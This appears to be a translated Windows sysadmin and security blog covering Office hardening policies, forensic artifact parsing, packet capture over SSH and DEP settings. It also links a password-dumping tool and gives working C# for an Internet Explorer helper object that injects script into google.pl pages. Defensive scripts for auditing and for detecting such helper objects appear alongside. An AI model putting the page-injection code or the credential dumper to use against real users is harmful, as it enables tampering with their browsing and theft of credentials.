  • Excel 2 worksheets: Enabled (File block setting: Block)
  • Excel 2007 and later add-in files: Enabled (File block setting: Block)
  • Excel 2007 and later binary workbooks: Enabled (File block setting: Block)
  • Excel 2007 and later macro-enabled workbooks and templates: Enabled (File block setting: Block)
  • Excel 3 macrosheets and add-in files: Enabled (File block setting: Block)
  • Excel 3 worksheets: Enabled (File block setting: Block)
  • Excel 4 macrosheets and add-in files: Enabled (File block setting: Block)
  • Excel 4 workbooks: Enabled (File block setting: Block)
  • Excel 4 worksheets: Enabled (File block setting: Block)
  • Excel 95 workbooks: Enabled (File block setting: Block)
  • Excel 95-97 workbooks and templates: Enabled (File block setting: Block)
  • Excel 97-2003 add-in files: Enabled (File block setting: Block)
  • Excel 97-2003 workbooks and templates: Enabled (File block setting: Block)
  • Set default file block behavior: Enabled (Blocked files are not opened)

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\File Block Settings
  • PowerPoint 97-2003 presentations, shows, templates and add-in files: Enabled (File block setting: Block)
  • PowerPoint beta files: Enabled (File block setting: Block)
  • Set default file block behavior: Enabled (Blocked files are not opened)

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\File Block Settings
  • Set default file block behavior: Enabled (Blocked files are not opened)
  • Word 2 and earlier binary documents and templates: Enabled (File block setting: Block)
  • Word 2000 binary documents and templates: Enabled (File block setting: Block)
  • Word 2003 binary documents and templates: Enabled (File block setting: Block)
  • Word 2007 binary and later binary documents and templates: Enabled (File block setting: Block)
  • Word 6.0 binary documents and templates: Enabled (File block setting: Block)
  • Word 95 binary documents and templates: Enabled (File block setting: Block)
  • Word 97 binary documents and templates: Enabled (File block setting: Block)
  • Word XP binary documents and templates: Enabled (File block setting: Block)

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security
  • Make hidden markup visible: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security
  • Make hidden markup visible: Enabled

LESS important setting

 

GPO setting: value

User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Privacy\Trust Center
  • Allow including screenshot with Office Feedback: Disabled
  • Automatically receive small updates to improve reliability: Disabled
  • Disable Opt-in Wizard on first run: Enabled
  • Enable Customer Experience Improvement Program: Disabled
  • Send Office Feedback: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings\Trust Center\Trusted Catalogs
  • Allow Unsecure Apps and Catalogs: Disabled
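To verify that the "MOST important" macro settings above actually landed on a machine, the following added PowerShell example (not from the original post) reads the registry values those policies write and reports drift. It assumes Office 2013 policies live under Software\Policies\Microsoft\Office\15.0\<App>\Security and that the value names VBAWarnings, AccessVBOM, AllowNetworkLocations and AllLocationsDisabled are those defined by the Office ADMX templates; none of these registry names appear on the page itself.

```powershell
# Added example (not from the original post): audit the registry values behind the
# "MOST important" Excel/PowerPoint/Word macro policies listed above and report drift.
# Assumptions (not stated on the page): Office 2013 = version key 15.0; the value names
# come from the Office ADMX templates; VBAWarnings = 4 is "Disable all without notification".

$OfficeApps = @('Excel', 'PowerPoint', 'Word')

function Get-ExpectedOfficeMacroPolicy {
    # Maps each GPO setting from the table to the registry value it writes and the state expected here
    param([Parameter(Mandatory)][string]$App, [string]$Hive = 'HKCU')
    $base = $Hive + ':\Software\Policies\Microsoft\Office\15.0\' + $App + '\Security'
    @(
        [pscustomobject]@{ App = $App; Setting = 'VBA Macro Notification Settings';        Path = $base;                     Name = 'VBAWarnings';           Expected = 4 }
        [pscustomobject]@{ App = $App; Setting = 'Trust Access to Visual Basic Project';   Path = $base;                     Name = 'AccessVBOM';            Expected = 0 }
        [pscustomobject]@{ App = $App; Setting = 'Allow Trusted Locations on the network'; Path = "$base\Trusted Locations"; Name = 'AllowNetworkLocations'; Expected = 0 }
        [pscustomobject]@{ App = $App; Setting = 'Disable all trusted locations';          Path = "$base\Trusted Locations"; Name = 'AllLocationsDisabled';  Expected = 1 }
    )
}

function Test-OfficeMacroPolicy {
    # Classifies each expected value as OK, DRIFT (present but wrong) or NOT CONFIGURED
    # (policy absent, so the user's own Trust Center choice applies instead of the GPO).
    param([string[]]$Apps = $OfficeApps, [string]$Hive = 'HKCU')
    foreach ($app in $Apps) {
        foreach ($rule in Get-ExpectedOfficeMacroPolicy -App $app -Hive $Hive) {
            $actual = $null
            if (Test-Path -LiteralPath $rule.Path) {
                $item = Get-ItemProperty -LiteralPath $rule.Path -Name $rule.Name -ErrorAction SilentlyContinue
                if ($item) { $actual = $item.($rule.Name) }
            }
            if ($null -eq $actual) { $status = 'NOT CONFIGURED' }
            elseif ($actual -eq $rule.Expected) { $status = 'OK' }
            else { $status = 'DRIFT' }

            [pscustomobject]@{
                App      = $app
                Setting  = $rule.Setting
                Value    = $rule.Name
                Expected = $rule.Expected
                Actual   = $actual
                Status   = $status
            }
        }
    }
}

# Check the current user's policy hive; pass -Hive HKLM to check machine policy.
# Anything not OK is a gap versus the table above.
Test-OfficeMacroPolicy | Format-Table -AutoSize
```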

default dll used by powerpoint

4 March 2016

User and Computer Remote AD

19 February 2016
  1. MS tool: http://www.microsoft.com/pl-pl/download/details.aspx?id=7887
  2. Run:

dism /online /enable-feature /featurename:RemoteServerAdministrationTools

dism /online /enable-feature /featurename:RemoteServerAdministrationTools-Roles

dism /online /enable-feature /featurename:RemoteServerAdministrationTools-Roles-AD

dism /online /enable-feature /featurename:RemoteServerAdministrationTools-Roles-AD-DS

dism /online /enable-feature /featurename:RemoteServerAdministrationTools-Roles-AD-DS-SnapIns

  3. Run: dsa.msc
Kategorie Power Shell, Windows

Protection of system security

3 November 2015

Password dumping, open source

1 September 2015
https://github.com/quarkslab/quarkspwdump
Categories: Cpp, Windows

Mandiant free forensic tools

24 June 2015
Source: https://www.mandiant.com/resources/downloads

  • Redline®
    Redline® is a free utility that accelerates the process of triaging hosts suspected of being compromised or infected while supporting in-depth live memory analysis.
  • IOC Editor
    Mandiant's IOC Editor is a free editor for Indicators of Compromise (IOCs).
  • IOC Finder
    Mandiant's IOC Finder is a free tool for collecting host system data and reporting the presence of Indicators of Compromise (IOCs).
  • Memoryze™
    Free memory forensics software designed to help incident responders find evil within live memory.
  • Memoryze™ for the Mac
    Free memory forensics software designed to help incident responders find evil within live memory.
  • Highlighter™
    Highlighter is designed to help security analysts and system administrators rapidly review log and other structured text files.
  • Web Historian™
    Web Historian's capabilities have been consolidated into Mandiant Redline.
  • Research: PdbXtract™
    PdbXtract is a tool to help you explore symbolic type information as extracted from Microsoft programming database files.
  • Research: Mandiant ApateDNS™
    Mandiant ApateDNS is a tool for controlling DNS responses through an easy to use graphical user interface (GUI).
  • Research: Mandiant Heap Inspector™
    Mandiant Heap Inspector is a heap visualization and analysis tool. It has the ability to collect a process' heaps using both API and raw methods.

Windows forensics - evidence of program execution

21 June 2015

Artifacts that can be investigated:

  • Prefetch
  • Shimcache (https://dl.mandiant.com/EE/library/Whitepaper_ShimCacheParser.pdf)
    • projects:
      • python: https://github.com/mandiant/ShimCacheParser
      • C#: https://github.com/woanware/shimcacheparser
  • MUICache
  • UserAssist

Interesting presentation: https://digital-forensics.sans.org/summit-archives/DFIR_Summit/Johnny-AppCompatCache-the-Ring-of-Malware-Brice-Daniels-and-Mary-Singh.pdf
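Of the four artifacts listed, UserAssist is the one most easily decoded by hand, so here is an added example (not from the original post or from any of the linked projects) that parses it. It reads the value-name/binary pairs found under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count: the value name is the ROT13-encoded program path, and the data is a 16-byte record on Windows XP (session id, run counter starting at 5, last-run FILETIME) or a 72-byte record on Windows 7 and later (run count at offset 4, focus count at 8, focus time in ms at 12, last-run FILETIME at 60). It goes slightly beyond the post by handling both layouts. The sample entries below are constructed for the example, not taken from a real registry; the function and helper names are the example's own.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-ns ticks since 1601-01-01 UTC
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """Convert a Windows FILETIME to an aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime; integer arithmetic so the round trip is exact."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def decode_userassist(value_name, blob):
    """Decode one value from a UserAssist ...\\Count key into a dict.

    value_name: the ROT13-encoded registry value name
    blob:       the REG_BINARY data, 16 bytes (Windows XP) or 72 bytes (Windows 7+)
    """
    path = codecs.decode(value_name, "rot_13")
    if len(blob) == 16:
        # XP layout: session id, run counter (starts at 5), FILETIME of the last run
        session, counter, last_ft = struct.unpack("<IIQ", blob)
        run_count = max(counter - 5, 0)
        focus_count = focus_ms = None
    elif len(blob) >= 68:
        # Windows 7+ layout: session id, run count, focus count, focus time in ms,
        # then ten float counters (16..55), 4 unknown bytes (56..59), FILETIME at 60
        session, run_count, focus_count, focus_ms = struct.unpack_from("<IIII", blob, 0)
        (last_ft,) = struct.unpack_from("<Q", blob, 60)
    else:
        raise ValueError("unexpected UserAssist value length: %d" % len(blob))
    return {
        "path": path,
        "session": session,
        "run_count": run_count,
        "focus_count": focus_count,
        "focus_time_ms": focus_ms,
        "last_run": filetime_to_datetime(last_ft) if last_ft else None,
    }


def timeline(entries):
    """Decode every entry and order by last run time, most recent first."""
    rows = [decode_userassist(name, blob) for name, blob in entries.items()]
    return sorted(rows, key=lambda r: r["last_run"] or FILETIME_EPOCH, reverse=True)


# --- constructed sample data (not from a real system) ------------------------

def build_sample_win7(run_count, focus_count, focus_ms, last_run):
    """Build a 72-byte Windows 7+ record; the float counters are left zeroed."""
    header = struct.pack("<IIII", 0, run_count, focus_count, focus_ms)
    return (header + b"\x00" * 40 + b"\x00" * 4
            + struct.pack("<Q", datetime_to_filetime(last_run)) + b"\x00" * 4)


def build_sample_xp(run_count, last_run):
    """Build a 16-byte Windows XP record (counter is stored as run_count + 5)."""
    return struct.pack("<IIQ", 0, run_count + 5, datetime_to_filetime(last_run))


SAMPLE_ENTRIES = {
    # ROT13 of C:\Windows\System32\cmd.exe
    r"P:\Jvaqbjf\Flfgrz32\pzq.rkr": build_sample_win7(
        7, 3, 120000, datetime(2015, 6, 21, 12, 0, tzinfo=timezone.utc)),
    # ROT13 of C:\Users\Public\tool.exe
    r"P:\Hfref\Choyvp\gbby.rkr": build_sample_win7(
        1, 1, 5000, datetime(2015, 6, 20, 8, 30, tzinfo=timezone.utc)),
    # ROT13 of UEME_RUNPATH:C:\notepad.exe (XP-style name and record)
    r"HRZR_EHACNGU:P:\abgrcnq.rkr": build_sample_xp(
        3, datetime(2015, 6, 19, 9, 0, tzinfo=timezone.utc)),
}

if __name__ == "__main__":
    for row in timeline(SAMPLE_ENTRIES):
        print(row["last_run"], row["run_count"], row["path"])
```

On a live system the entries come from each Count subkey via the registry API or from an exported NTUSER.DAT hive; the decode logic is the same. Entries whose FILETIME is zero were recorded without a last-run time and sort to the end.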

Forwarding tcpdump output from Linux to Windows

8 June 2015

The capture runs on the remote host; tcpdump writes the pcap stream to stdout (-w -), SSH carries it back, and a local Wireshark reads it from stdin (-i -). The -k switch starts capturing immediately.

Linux:

ssh xdalny-linux "tcpdump -s0 -w - 'port 8080'" | wireshark -k -i -

Windows:

plink -ssh username@remote-host "tcpdump -s 0 -w - 'port 8080'" | wireshark -i -

Source: https://kaischroed.wordpress.com/2013/01/28/howto-use-wireshark-over-ssh/

Data Execution Prevention

1 June 2015

A rarely enabled protection whose purpose is to prevent code from being executed from data segments.

DEP can be configured directly by changing options in the Boot.ini file, from the System tab of the Control Panel, or via the registry:

  1. Via the registry (the value 0 keeps DEP enabled for Explorer; the policy "Turn off Data Execution Prevention for Explorer" sets it to 1):

     32-bit version
     reg.exe add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer" /v "NoDataExecutionPrevention" /t REG_DWORD /d 0 /f
     64-bit version
     reg.exe add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer" /v "NoDataExecutionPrevention" /t REG_DWORD /d 0 /f /reg:64

  2. Via the GUI settings:

  3. Via settings in the Boot.ini file:

     Boot.ini: /noexecute=security_level, where security_level is replaced by one of: AlwaysOn, AlwaysOff, OptIn or OptOut.

     OPTIN: the default setting on Windows XP and Windows Vista. DEP protects only Windows system programs.

     OPTOUT: the default setting on Microsoft Windows Server 2003 SP1. DEP protects all processes; on the System tab of the Control Panel you can, however, enter a list of programs that DEP should not cover.

     ALWAYSON: enables full DEP protection for the system. All processes are covered by DEP and no exceptions can be created.

     ALWAYSOFF: disables DEP protection regardless of whether it is supported by hardware or not.

Categories: Windows

Injecting JavaScript into IE using a BHO

13 May 2015

JavaScript code injection can be done with VS Express Edition.

Example code (project type "Visual C# -> Class Library"):

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using SHDocVw;                         // COM reference "Microsoft Internet Controls": WebBrowser, DWebBrowserEvents2
using mshtml;                          // COM reference "Microsoft HTML Object Library": HTMLDocument, IHTMLElement, ...
using System.IO;
using Microsoft.Win32;                 // RegistryKey for the COM (un)registration functions
using System.Runtime.InteropServices;  // ComVisible, Guid, Marshal, PreserveSig


namespace FE_JSinjector
{
    // IObjectWithSite is the interface through which IE hands a BHO its hosting
    // WebBrowser; the GUID is the fixed IID of that COM interface.
    [
        ComVisible(true),
        InterfaceType(ComInterfaceType.InterfaceIsIUnknown),
        Guid("FC4801A3-2BA9-11CF-A229-00AA003D7352")
    ]
    public interface IObjectWithSite
    {
        [PreserveSig]
        int SetSite([MarshalAs(UnmanagedType.IUnknown)]object site);
        [PreserveSig]
        int GetSite(ref Guid guid, out IntPtr ppvSite);
    }

    public class BHOInjector : IObjectWithSite
    {
        // IE loads every CLSID listed as a subkey of this key at startup
        public const string BHO_REGISTRY_KEY_NAME = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects";

        private WebBrowser webBrowser;

        // Called by IE with the browser instance on load (site != null) and with null on teardown
        public int SetSite(object site)
        {
            if (site != null)
            {
                webBrowser = (WebBrowser)site;
                webBrowser.DocumentComplete +=
                  new DWebBrowserEvents2_DocumentCompleteEventHandler(
                  this.OnDocumentComplete);
            }
            else
            {
                webBrowser.DocumentComplete -=
                  new DWebBrowserEvents2_DocumentCompleteEventHandler(
                  this.OnDocumentComplete);
                webBrowser = null;
            }

            return 0;

        }


        // Returns the requested interface of the site object; the temporary IUnknown is released
        public int GetSite(ref Guid guid, out IntPtr ppvSite)
        {
            IntPtr punk = Marshal.GetIUnknownForObject(webBrowser);
            int hr = Marshal.QueryInterface(punk, ref guid, out ppvSite);
            Marshal.Release(punk);
            return hr;
        }

        // Fires after every document has finished loading; the injection happens here
        public void OnDocumentComplete(object pDisp, ref object URL)
        {
            HTMLDocument document = (HTMLDocument)webBrowser.Document;

            if (URL.ToString().Contains("www.google.pl"))
            {
                // Append a <script> element to <head> defining the hidediv() function
                IHTMLElement head = (IHTMLElement)((IHTMLElementCollection)
                                        document.all.tags("head")).item(null, 0);
                IHTMLScriptElement scriptObject =
                    (IHTMLScriptElement)document.createElement("script");
                scriptObject.type = @"text/javascript";
                scriptObject.text = "\nfunction hidediv(){document.getElementById" +
                                    "('myOwnUniqueId12345').style.visibility = 'hidden';}\n\n";
                ((HTMLHeadElement)head).appendChild((IHTMLDOMNode)scriptObject);

                // Insert a fixed-position <div> at the top of <body> (CSS uses "prop:value")
                string div = "<div id=\"myOwnUniqueId12345\" style=\"position:" +
                                "fixed;bottom:0px;right:0px;z-index:9999;width:300px;" +
                                "height:150px;\"> <div style=\"position:relative;" +
                                "float:right;font-size:9px;\"><a " +
                                "href=\"javascript:hidediv();\">close</a></div>" +
                    "My content goes here ...</div>";

                document.body.insertAdjacentHTML("afterBegin", div);
            }
        }
        #region BHO Internal Functions
        // Run by RegAsm: add our CLSID under the BHO key so IE loads this assembly
        [ComRegisterFunction]
        public static void RegisterBHO(Type type)
        {
            RegistryKey registryKey =
            Registry.LocalMachine.OpenSubKey(BHO_REGISTRY_KEY_NAME, true);

            if (registryKey == null)
                registryKey = Registry.LocalMachine.CreateSubKey(BHO_REGISTRY_KEY_NAME);

            string guid = type.GUID.ToString("B");
            RegistryKey ourKey = registryKey.OpenSubKey(guid);

            if (ourKey == null)
                ourKey = registryKey.CreateSubKey(guid);

            // NoExplorer=1: load in Internet Explorer only, not in Windows Explorer
            ourKey.SetValue("NoExplorer", 1, RegistryValueKind.DWord);

            registryKey.Close();
            ourKey.Close();
        }

        // Run by RegAsm /unregister: remove our CLSID subkey again
        [ComUnregisterFunction]
        public static void UnregisterBHO(Type type)
        {
            RegistryKey registryKey =
            Registry.LocalMachine.OpenSubKey(BHO_REGISTRY_KEY_NAME, true);
            string guid = type.GUID.ToString("B");

            if (registryKey != null)
                registryKey.DeleteSubKey(guid, false);
        }

        #endregion
    }
}

Registration in the system:

  1. Before compiling, tick "Make assembly COM-Visible" in VS (Solution Explorer -> Assembly Information... -> at the bottom of the popup)
  2. Add a Strong Name (Solution Explorer -> Signing -> checkbox: Sign the assembly -> <new...> and go through the wizard)
  3. Copy the DLL to the %ProgramFiles%\Internet Explorer\Wtyczki directory
  4. (32-bit version) run RegAsm /codebase on the library using the .NET Framework copy, e.g. Windows\Microsoft.NET\Framework\v4.X.XXXX\RegAsm.exe
  5. (64-bit version) run RegAsm /codebase on the library using the .NET Framework copy, e.g. Windows\Microsoft.NET\Framework64\v4.X.XXXX\RegAsm.exe
  6. Enable the plugin in IE
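The flip side of the registration above is finding such objects on a host: every BHO must leave a CLSID subkey under the same Browser Helper Objects key, and that CLSID has to resolve to a DLL through HKCR\CLSID\{clsid}\InprocServer32. The following added example (not part of the original post) inventories those registrations and flags the ones worth a closer look: a CLSID with no InprocServer32, a DLL loaded from outside the Program Files or Windows trees (the assumed normal location for vendor BHOs), and, as information only, NoExplorer=1 as set by the code above. The assessment is separated from the registry access so it can run over the constructed sample registrations embedded below (placeholder GUIDs and paths, not real data); on Windows the collect_from_registry function reads both the 64-bit and the 32-bit registry views. Function and constant names are the example's own.

```python
import ntpath
import re

# The same key the injector registers itself under (BHO_REGISTRY_KEY_NAME above)
BHO_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"

GUID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")

# Assumption for this example: vendor BHOs normally live under these roots;
# a DLL in a user profile, temp or ProgramData directory deserves a look.
EXPECTED_ROOTS = (r"c:\program files", r"c:\program files (x86)", r"c:\windows")


def normalize_path(dll_path):
    """Expand %VARS%, strip surrounding quotes and lower-case for uniform comparison."""
    return ntpath.expandvars(dll_path).strip().strip('"').lower()


def assess_bho(clsid, values, dll_path):
    """Return a list of findings for one BHO registration (empty list = nothing notable).

    clsid:    the subkey name under BHO_KEY, e.g. "{...}"
    values:   dict of the values stored in that subkey, e.g. {"NoExplorer": 1}
    dll_path: default value of HKCR\\CLSID\\{clsid}\\InprocServer32, or None if absent
    """
    findings = []
    if not GUID_RE.match(clsid):
        findings.append("subkey name is not a CLSID: %s" % clsid)
    if dll_path is None:
        findings.append("CLSID does not resolve to an InprocServer32 DLL (dangling registration)")
    else:
        path = normalize_path(dll_path)
        if not any(path.startswith(root + "\\") for root in EXPECTED_ROOTS):
            findings.append("DLL outside Program Files/Windows: %s" % path)
    if values.get("NoExplorer") == 1:
        findings.append("NoExplorer=1: loaded by Internet Explorer only, not by Windows Explorer")
    return findings


def report(registrations):
    """Map each (clsid, values, dll_path) registration to its findings."""
    return {clsid: assess_bho(clsid, values, dll) for clsid, values, dll in registrations}


def collect_from_registry():
    """Windows only: read live BHO registrations from both the 64-bit and 32-bit views."""
    import winreg  # imported lazily so the assessment logic also runs on other platforms
    results = []
    for view in (winreg.KEY_WOW64_64KEY, winreg.KEY_WOW64_32KEY):
        try:
            root = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, BHO_KEY, 0, winreg.KEY_READ | view)
        except OSError:
            continue
        with root:
            i = 0
            while True:
                try:
                    clsid = winreg.EnumKey(root, i)
                except OSError:
                    break
                i += 1
                values = {}
                with winreg.OpenKey(root, clsid) as sub:
                    j = 0
                    while True:
                        try:
                            name, data, _ = winreg.EnumValue(sub, j)
                        except OSError:
                            break
                        values[name] = data
                        j += 1
                try:
                    srv = winreg.OpenKey(winreg.HKEY_CLASSES_ROOT,
                                         r"CLSID\%s\InprocServer32" % clsid, 0,
                                         winreg.KEY_READ | view)
                    with srv:
                        dll_path, _ = winreg.QueryValueEx(srv, "")
                except OSError:
                    dll_path = None
                results.append((clsid, values, dll_path))
    return results


# Constructed sample registrations (placeholder GUIDs, not from a real system)
SAMPLE_REGISTRATIONS = [
    ("{11111111-2222-3333-4444-555555555555}", {"NoExplorer": 1}, r"C:\Users\Public\FE_JSinjector.dll"),
    ("{66666666-7777-8888-9999-AAAAAAAAAAAA}", {}, r"C:\Program Files\Vendor\helper.dll"),
    ("{BBBBBBBB-CCCC-DDDD-EEEE-FFFFFFFFFFFF}", {}, None),
]

if __name__ == "__main__":
    try:
        regs = collect_from_registry()
    except ImportError:
        regs = SAMPLE_REGISTRATIONS  # not on Windows: fall back to the constructed sample
    for clsid, findings in report(regs).items():
        print(clsid, findings or "no findings")
```

The path check is a heuristic, not an allow-list: a signed vendor BHO in an unusual directory is merely a reason to look at the file (signature, hash, install date), and a NoExplorer value by itself is common in legitimate add-ons.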

Categories: CSharp, Windows